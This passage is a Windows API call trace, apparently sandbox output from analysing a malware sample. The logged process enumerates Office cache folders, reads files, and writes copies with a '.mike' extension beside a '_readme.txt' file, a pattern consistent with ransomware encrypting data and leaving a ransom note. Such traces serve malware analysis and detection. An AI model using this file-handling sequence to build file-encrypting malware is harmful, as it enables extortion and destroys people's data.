ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0041.429] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0041.430] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e0bfe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e0bfe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e0bfe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.xml.mike", cAlternateFileName="ACCESS~1.MIK")) returned 1 [0041.430] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e32140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e32140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e582a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0041.430] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e0bfe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e0bfe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e582a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0041.431] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e0bfe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e0bfe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e582a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0041.431] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.431] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0041.431] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0041.431] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0041.431] CoTaskMemFree (pv=0x4fe370) [0041.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0041.431] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0041.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0041.431] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0041.431] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpFilePart=0x0) returned 0x4c [0041.432] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.433] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.434] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0041.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0041.435] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpFilePart=0x0) returned 0x59 [0041.435] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.435] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.435] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0041.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.437] GetFileType (hFile=0x264) returned 0x1 [0041.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0041.437] GetFileType (hFile=0x264) returned 0x1 [0041.437] CloseHandle (hObject=0x264) returned 1 [0041.437] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.437] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.437] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0041.437] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0041.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0041.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.437] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21784a8 | out: lpFileInformation=0x21784a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0041.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.437] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.438] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x217880c | out: lpFileInformation=0x217880c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0041.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", lpFilePart=0x0) returned 0x5e [0041.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0041.438] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0041.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", lpFilePart=0x0) returned 0x5e [0041.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0041.438] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0041.439] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", lpFilePart=0x0) returned 0x5e [0041.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0041.439] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.439] GetFileType (hFile=0x264) returned 0x1 [0041.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0041.439] GetFileType (hFile=0x264) returned 0x1 [0041.439] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0041.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.440] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2179314 | out: lpFileInformation=0x2179314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0041.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.440] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0041.440] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.440] GetFileType (hFile=0x264) returned 0x1 [0041.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0041.440] GetFileType (hFile=0x264) returned 0x1 [0041.440] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0041.440] ReadFile (in: hFile=0x264, lpBuffer=0x217a9d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x217a9d4*, lpNumberOfBytesRead=0x2af0c8*=0x545, lpOverlapped=0x0) returned 1 [0041.442] CloseHandle (hObject=0x264) returned 1 [0041.442] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", lpFilePart=0x0) returned 0x5e [0041.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0041.442] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.443] GetFileType (hFile=0x264) returned 0x1 [0041.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0041.443] GetFileType (hFile=0x264) returned 0x1 [0041.443] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0041.443] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", lpFilePart=0x0) returned 0x5e [0041.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0041.443] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.443] GetFileType (hFile=0x264) returned 0x1 [0041.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0041.443] GetFileType (hFile=0x264) returned 0x1 [0041.444] WriteFile (in: hFile=0x264, lpBuffer=0x2182ac4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2182ac4*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0041.444] CloseHandle (hObject=0x264) returned 1 [0041.445] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0041.445] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike", lpFilePart=0x0) returned 0x5e [0041.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0041.445] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.mike" (normalized: 